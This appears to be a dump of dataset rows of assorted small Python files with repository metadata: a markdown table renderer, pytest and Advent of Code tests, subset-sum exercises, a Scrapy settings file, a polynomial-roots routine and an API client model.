"""Markdown table attributes.
Attributes:
box: True if table and rows framed by box.
columns: The list of column attributes.
heading: The number of non-empty headings.
"""
def __init__(self, box=False):
self.box = box
self.heading = 0
self.columns = []
def AddColumn(self, align='left', label='', width=0):
"""Adds the next column attributes to the table."""
if label:
self.heading += 1
self.columns.append(
TableColumnAttributes(align=align, label=label, width=width))
def GetPrintFormat(self):
"""Constructs and returns a resource_printer print format."""
fmt = ['table']
attr = []
if self.box:
attr += 'box'
if not self.heading:
attr += 'no-heading'
if attr:
fmt += '[' + ','.join(attr) + ']'
fmt += '('
for index, column in enumerate(self.columns):
if index:
fmt += ','
fmt += '[{}]:label={}:align={}'.format(
index, repr(column.label or '').lstrip('u'), column.align)
if column.width:
fmt += ':width={}'.format(column.width)
fmt += ')'
return ''.join(fmt)
@six.add_metaclass(abc.ABCMeta)
class Renderer(object): # pytype: disable=ignored-abstractmethod
r"""Markdown renderer base class.
The member functions provide an abstract document model that matches markdown
entities to output document renderings.
Attributes:
_blank: True if the output already contains a blank line. Used to avoid
sequences of 2 or more blank lines in the output.
_font: The font attribute bitmask.
_indent: List of left indentations in characters indexed by _level.
_lang: ```lang\n...\n``` code block language. None if not in code block,
'' if in code block with no explicit lang specified.
_level: The section or list level counting from 0.
_out: The output stream.
_title: The document tile.
_width: The output width in characters.
"""
def __init__(self, out=None, title=None, width=80):
self._blank = True
self._font = 0
self._indent = []
self._lang = None
self._level = 0
self._out = out or log.out
self._title = title
self._width = width
def Blank(self):
"""The last output line is blank."""
self._blank = True
def Content(self):
"""Some non-blank line content was added to the output."""
self._blank = False
def HaveBlank(self):
"""Returns True if the last output line is blank."""
return self._blank
def Entities(self, buf):
"""Converts special characters to their entity tags.
This is applied after font embellishments.
Args:
buf: The normal text that may contain special characters.
Returns:
The escaped string.
"""
return buf
def Escape(self, buf):
"""Escapes special characters in normal text.
This is applied before font embellishments.
Args:
buf: The normal text that may contain special characters.
Returns:
The escaped string.
"""
return buf
def Finish(self):
"""Finishes all output document rendering."""
return None
def Font(self, unused_attr, unused_out=None):
"""Returns the font embellishment string for attr.
Args:
unused_attr: None to reset to the default font, otherwise one of BOLD,
ITALIC, or CODE.
unused_out: Writes tags line to this stream if not None.
Returns:
The font embellishment string.
"""
return ''
def SetLang(self, lang):
"""Sets the ```...``` code block language.
Args:
lang: The language name, None if not in a code block, '' is no explicit
language specified.
"""
self._lang = lang
def Line(self):
"""Renders a paragraph separating line."""
pass
def Link(self, target, text):
"""Renders an anchor.
Args:
target: The link target URL.
text: The text to be displayed instead of the link.
Returns:
The rendered link anchor and text.
"""
if text:
if target and '://' in target:
# Show non-local targets.
return '{0} ({1})'.format(text, target)
return text
if target:
return target
return '[]()'
def TableLine(self, line, indent=0):
"""Adds an indented table line to the output.
Args:
line: The line to add. A newline will be added.
indent: The number of characters to indent the table.
"""
self._out.write(indent * ' ' + line + '\n')
def Table(self, table, rows):
"""Renders a table.
Nested tables are not supported.
Args:
table: A TableAttributes object.
rows: A list of rows where each row is a list of column strings.
"""
self.Line()
indent = self._indent[self._level].indent + 2
buf = io.StringIO()
resource_printer.Print(rows, table.GetPrintFormat(), out=buf)
for line in buf.getvalue().split('\n')[:-1]:
self.TableLine(line, indent=indent)
self.Content()
self.Line()
| [
"staleyh@gmail.com"
] | staleyh@gmail.com |
8a9acded12be8b653aa5df5f824ffced7e8b7321 | 9a7a7e43902b6bc5a9e96933da8814acf3f318a3 | /Demo_Pytest/test_case/test_case2/test_demo1.py | 16ff01ee52ffb99c288240934acec7c8936d1bd5 | [] | no_license | liuchangfu/python_script | 9684d512f4bb09f37585e3fc56329be2ea8d6eb5 | 73f0e71364fc2271626e0deff54b4079ad92390c | refs/heads/master | 2020-03-15T16:05:47.624545 | 2018-06-08T10:44:17 | 2018-06-08T10:44:17 | 132,226,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | import pytest
def func(x):
return x+1
def test_func1():
assert func(3) == 4
def test_func2():
assert func(3) == 3
def test_func3():
assert func(3) != 2
if __name__ == '__main__':
pytest.main() | [
"shift_1220@163.com"
] | shift_1220@163.com |
be9534885c37fcd145ac76851d1034085cff3e71 | 282d0a84b45b12359b96bbf0b1d7ca9ee0cb5d19 | /Malware1/venv/Lib/site-packages/numpy/core/tests/test_overrides.py | d7809428f80a8bd0c97c84402be95d52b083fb73 | [] | no_license | sameerakhtar/CyberSecurity | 9cfe58df98495eac6e4e2708e34e70b7e4c055d3 | 594973df27b4e1a43f8faba0140ce7d6c6618f93 | refs/heads/master | 2022-12-11T11:53:40.875462 | 2020-09-07T23:13:22 | 2020-09-07T23:13:22 | 293,598,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a916bc00e3819de8d2e997d6eef3f783e8e2a05748c01049de162b3d95f2ee4b
size 13196
| [
"46763165+sameerakhtar@users.noreply.github.com"
] | 46763165+sameerakhtar@users.noreply.github.com |
d9ed2fd3233c96c9b3ace22bf68412e6cc5af7a6 | 60618d48e09a140926d97b01cb9b6f76fcc65703 | /others/Card/cards_main.py | be2e8585610bcbc712cae5e93d806cbde9aa1693 | [] | no_license | Incipe-win/Python | ca8f36cc8785eb13512f71a3cf10149d4e1b855e | 5bab36b90591c74dedb6ead3484a279b90a1bcbd | refs/heads/master | 2021-01-07T08:11:42.293541 | 2020-12-06T09:17:02 | 2020-12-06T09:17:02 | 241,629,236 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | #! /usr/bin/python3
from Card import cards_tools
while True:
cards_tools.show_menu()
choose = input("请输入您的选择:")
if choose in ["1", "2", "3"]:
# 1. 新增名片
if choose == "1":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.new_card()
# 2. 显示全部
elif choose == "2":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.show_all()
# 3. 查询名片
elif choose == "3":
print("您的选择是: %s" % cards_tools.action[int(choose)])
cards_tools.search_card()
elif choose == "0":
print("您的选择是: %s" % cards_tools.action[int(choose)])
print("欢迎您的使用,祝您生活愉快!")
break
else:
print("输入错误,请重新输入!", end="\n\n")
continue
| [
"whc_9_13@163.com"
] | whc_9_13@163.com |
353c1f2652ec393eed4ab2a925dfb5c730c2ffa6 | 88a2f57b7d660228ca1ac922f0f582910bcacb3d | /algorithm/day03/부분집합.py | 4009ee3e894b07da049d639b1bab33c87493d2b5 | [] | no_license | chelseashin/TIL | adc5ed0bd4ba084e85b74baa9699096a7af5585e | 376b56844985b3ff43b94fa18086a449e6deac69 | refs/heads/master | 2022-12-10T02:13:39.680936 | 2020-11-19T13:18:30 | 2020-11-19T13:18:30 | 162,103,813 | 2 | 0 | null | 2022-12-08T04:53:38 | 2018-12-17T09:11:23 | Jupyter Notebook | UTF-8 | Python | false | false | 954 | py | # 부분집합
bit = [0,0,0,0]
for i in range(2):
bit[0] = i
for j in range(2):
bit[1] = j
for k in range(2):
bit[2] = k
for l in range(2):
bit[3] = l
print(bit)
# 부분집합 2
arr = [1, 2, 3]
n = len(arr)
for i in range(1 << n): # 1<<n : 부분 집합의 개수
for j in range(n): # 원소의 수만큼 비트를 비교함
if i & (1 << j): # i의 j번째 비트가 1이면 j번재 원소 출력
print(arr[j], end = ', ')
print()
print()
# 부분집합(Subset Sum) 문제
arr = [-7, -3, -2, 5, 8]
sum = 0
cnt = 0
for i in range(1, 1 << len(arr)):
sum = 0
for j in range(len(arr)):
if i & (1 << j):
sum += arr[j]
if sum == 0:
cnt += 1
for j in range(len(arr)):
if i & (1 << j):
print(arr[j], end =" ")
print()
print("개수 : {}".format(cnt)) | [
"chaewonshin95@gmail.com"
] | chaewonshin95@gmail.com |
c52109bbe3a17f7efa023a3985d47abef966079d | faefc32258e04fa8ed404f129c6e635345ad2cd7 | /permute_data.py | fb109475cc5fbbf6730cacd3d23a3be2cbe057f5 | [] | no_license | lodhaz/Poisson-Equation-Solving-with-DL | 1c1e309abb186c5b081a4ebae83d3652884dd831 | 38dbc2e7334d71d7c3120a5d2f7452b82d904cef | refs/heads/master | 2020-04-06T15:07:17.232859 | 2018-10-26T07:23:19 | 2018-10-26T07:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | # coding: utf-8
# Author: Zhongyang Zhang
# Email : mirakuruyoo@gmail.com
import h5py
import numpy as np
import pickle
root = '/Volumes/Takanashi/Datasets_Repo/POISSON/'#'./TempData/'
DATA_PATH = [root + 'train_data_2.mat', root + 'test_data_2.mat']
train_data = h5py.File(DATA_PATH[0], 'r')
test_data = h5py.File(DATA_PATH[1], 'r')
train_data = dict((key, value) for key, value in train_data.items() if key == 'X_2_train' or key == 'Y_train')
test_data = dict((key, value) for key, value in test_data.items() if key == 'X_2_test' or key == 'Y_test')
train_data_X = np.transpose(train_data['X_2_train'], (3, 2, 1, 0))
train_data_Y = np.transpose(train_data['Y_train'], (2, 1, 0))
test_data_X = np.transpose(test_data['X_2_test'], (3, 2, 1, 0))
test_data_Y = np.transpose(test_data['Y_test'], (2, 1, 0))
train_pairs = [(x, y.T.reshape(-1)) for x, y in zip(train_data_X, train_data_Y)]
test_pairs = [(x, y.T.reshape(-1)) for x, y in zip(test_data_X, test_data_Y)]
pickle.dump(train_pairs, open(root+'train_data_2.pkl', 'wb+'))
pickle.dump(test_pairs, open(root+'test_data_2.pkl', 'wb+'))
| [
"786671043@qq.com"
] | 786671043@qq.com |
f5ff2eeb847505f1ee2df77fa7520501b178d23c | d55f8836d27dcbe56ce62623f1a69f33c0fd950d | /UpWork_Projects/andy_upwork/familyDollar/familyDollar/settings.py | 6582f744414d292a2be638e7fd1276830914c363 | [
"MIT"
] | permissive | SurendraTamang/Web-Scrapping | f12f0f8fcb4b6186ecab38c8036181e4d1560bed | 2bb60cce9010b4b68f5c11bf295940832bb5df50 | refs/heads/master | 2022-11-11T10:32:31.405058 | 2020-06-17T19:34:33 | 2020-06-17T19:34:33 | 273,258,179 | 0 | 1 | null | 2020-06-18T14:20:43 | 2020-06-18T14:20:42 | null | UTF-8 | Python | false | false | 3,387 | py | # -*- coding: utf-8 -*-
# Scrapy settings for familyDollar project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'Googlebot'
SPIDER_MODULES = ['familyDollar.spiders']
NEWSPIDER_MODULE = 'familyDollar.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'familyDollar.middlewares.FamilydollarSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
'scrapy_selenium.SeleniumMiddleware': 800,
}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'familyDollar.pipelines.FamilydollarPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
SELENIUM_DRIVER_NAME = 'chrome'
SELENIUM_DRIVER_EXECUTABLE_PATH = "../chromedriver_windows"
#SELENIUM_DRIVER_ARGUMENTS=['--headless']
SELENIUM_DRIVER_ARGUMENTS=[]
FEED_EXPORT_ENCODING = 'utf-8' | [
"p.byom26@gmail.com"
] | p.byom26@gmail.com |
acc5ce91a9ee2aafef0938a2e4fb9c066bef1e06 | 795df757ef84073c3adaf552d5f4b79fcb111bad | /r8lib/roots_to_r8poly.py | 74d2b4ce32f489ed8923d11cdc132ba501f2d69d | [] | no_license | tnakaicode/jburkardt-python | 02cb2f9ba817abf158fc93203eb17bf1cb3a5008 | 1a63f7664e47d6b81c07f2261b44f472adc4274d | refs/heads/master | 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | #! /usr/bin/env python
#
def roots_to_r8poly ( n, x ):
#*****************************************************************************80
#
## ROOTS_TO_R8POLY converts polynomial roots to polynomial coefficients.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 16 April 2005
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, integer N, the number of roots specified.
#
# Input, real X(N), the roots.
#
# Output, real C(1:N+1), the coefficients of the polynomial.
#
import numpy as np
#
# Initialize C to (0, 0, ..., 0, 1).
# Essentially, we are setting up a divided difference table.
#
c = np.zeros ( n + 1 )
c[n] = 1.0
#
# Convert to standard polynomial form by shifting the abscissas
# of the divided difference table to 0.
#
for j in range ( 1, n + 1 ):
for i in range ( 1, n + 2 - j ):
c[n-i] = c[n-i] - x[n+1-i-j] * c[n-i+1]
return c
def roots_to_r8poly_test ( ):
#*****************************************************************************80
#
## ROOTS_TO_R8POLY_TEST tests ROOTS_TO_R8POLY.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 11 March 2015
#
# Author:
#
# John Burkardt
#
import numpy as np
import platform
from r8poly_print import r8poly_print
from r8vec_print import r8vec_print
n = 5
x = np.array ( [ \
[ 1.0 ], \
[ -4.0 ], \
[ 3.0 ], \
[ 0.0 ], \
[ 3.0 ] ] );
print ( '' )
print ( 'ROOTS_TO_R8POLY_TEST' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' ROOTS_TO_R8POLY is given N real roots,' )
print ( ' and constructs the coefficient vector' )
print ( ' of the corresponding polynomial.' )
r8vec_print ( n, x, ' N real roots:' )
c = roots_to_r8poly ( n, x )
r8poly_print ( n, c, ' The polynomial:' )
#
# Terminate.
#
print ( '' )
print ( 'ROOTS_TO_R8POLY_TEST:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
roots_to_r8poly_test ( )
timestamp ( )
| [
"tnakaicode@gmail.com"
] | tnakaicode@gmail.com |
c0d6f7df93ff44f22b0fbc7c4c22a28f199d0a8d | bc2a96e8b529b0c750f6bc1d0424300af9743904 | /acapy_client/models/v10_present_proof_module_response.py | 9f0dd0cbcdc952d714e52ad3c2b8f6a7160c032a | [
"Apache-2.0"
] | permissive | TimoGlastra/acapy-client | d091fd67c97a57f2b3462353459780281de51281 | d92ef607ba2ff1152ec15429f2edb20976991424 | refs/heads/main | 2023-06-29T22:45:07.541728 | 2021-08-03T15:54:48 | 2021-08-03T15:54:48 | 396,015,854 | 1 | 0 | Apache-2.0 | 2021-08-14T13:22:28 | 2021-08-14T13:22:27 | null | UTF-8 | Python | false | false | 1,247 | py | from typing import Any, Dict, List, Type, TypeVar
import attr
T = TypeVar("T", bound="V10PresentProofModuleResponse")
@attr.s(auto_attribs=True)
class V10PresentProofModuleResponse:
""" """
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
v10_present_proof_module_response = cls()
v10_present_proof_module_response.additional_properties = d
return v10_present_proof_module_response
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| [
"dbluhm@pm.me"
] | dbluhm@pm.me |
194adeed213f29512491a64c1fe37a13dc9a9895 | a35ffe5fd1d4fe8cb68fe8807c80aa7fec219271 | /6. hafta - open_cv_devam/9_kirmizi_pikselleri_yok_etme.py | ccf49a746ef679a6d0ea1fd3ad436d8d2a9ae1e1 | [] | no_license | huseyin1701/goruntu_isleme | 2a3580ee970265094cd73d5b238676c57013f192 | d4a42cb35be175ac5549611858fc2b42d0eaafc6 | refs/heads/master | 2023-04-23T23:13:38.378867 | 2021-05-10T12:48:07 | 2021-05-10T12:48:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import cv2 as cv
resim = cv.imread("resim/manzara.jpg")
print(resim.shape)
print(resim[0, 0])
for a in resim:
for b in a:
#print(b)
b[2] = 0
cv.imshow("a", resim)
cv.waitKey(0)
| [
"huseyingunes@gmail.com"
] | huseyingunes@gmail.com |
850295881c10098324f479559b5f35013e9d233c | b1bbfe2fa31d761d6a4658b022d344b5a0cb7dd8 | /2-add_two_numbers.py | 36e1dca017b8827f1873a0a36de3dad133a8f487 | [] | no_license | stevestar888/leetcode-problems | f5917efc3516f8e40d5143b4dc10583c1e22dabd | 844f502da4d6fb9cd69cf0a1ef71da3385a4d2b4 | refs/heads/master | 2022-11-12T05:01:02.794246 | 2022-10-28T16:45:48 | 2022-10-28T16:45:48 | 248,663,356 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | """
https://leetcode.com/problems/add-two-numbers/
A few tricky cases:
[5]
[5]
[0]
[0]
"""
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
BASE = 10
carry = 0
head = ListNode(0)
curr = head
while l1 or l2 or carry:
l1_num, l2_num = 0, 0
if l1:
l1_num = l1.val
l1 = l1.next
if l2:
l2_num = l2.val
l2 = l2.next
digit = carry + l1_num + l2_num
#if we had a 1 carry into this digit
if carry == 1:
carry -= 1
#if we need to carry into the next digit
if digit >= 10:
digit %= BASE
carry += 1
# print(digit, carry)
digit_node = ListNode(digit)
curr.next = digit_node
curr = curr.next
return head.next
| [
"noreply@github.com"
] | stevestar888.noreply@github.com |
dbc091ff7c675c3e6c98899dae3ee66141845480 | a39ed5db6c75c9ae1f5e05118794c64102dc5f7a | /2022/15_2/solution_test.py | c8b8d15b3ece0d0f33d2976457bdc0fe9d8b446a | [
"MIT"
] | permissive | budavariam/advent_of_code | b656d5caf5d05113b82357754eb225e61e89ac0d | 635be485ec691f9c0cdeb83f944de190f51c1ba3 | refs/heads/master | 2022-12-25T18:12:00.981365 | 2022-12-20T08:20:51 | 2022-12-20T08:20:51 | 114,570,426 | 1 | 1 | MIT | 2022-12-09T09:29:06 | 2017-12-17T21:36:00 | Python | UTF-8 | Python | false | false | 1,143 | py | """ Advent of code 2022 day 15 / 2 """
import unittest
from solution import solution
class MyTest(unittest.TestCase):
"""Unist tests for actual day"""
def test_basic(self):
"""Test from the task"""
self.assertEqual(
solution(
"""Sensor at x=2, y=18: closest beacon is at x=-2, y=15
Sensor at x=9, y=16: closest beacon is at x=10, y=16
Sensor at x=13, y=2: closest beacon is at x=15, y=3
Sensor at x=12, y=14: closest beacon is at x=10, y=16
Sensor at x=10, y=20: closest beacon is at x=10, y=16
Sensor at x=14, y=17: closest beacon is at x=10, y=16
Sensor at x=8, y=7: closest beacon is at x=2, y=10
Sensor at x=2, y=0: closest beacon is at x=2, y=10
Sensor at x=0, y=11: closest beacon is at x=2, y=10
Sensor at x=20, y=14: closest beacon is at x=25, y=17
Sensor at x=17, y=20: closest beacon is at x=21, y=22
Sensor at x=16, y=7: closest beacon is at x=15, y=3
Sensor at x=14, y=3: closest beacon is at x=15, y=3
Sensor at x=20, y=1: closest beacon is at x=15, y=3""",
20,
),
56000011,
)
if __name__ == "__main__":
unittest.main()
| [
"budavariam@gmail.com"
] | budavariam@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.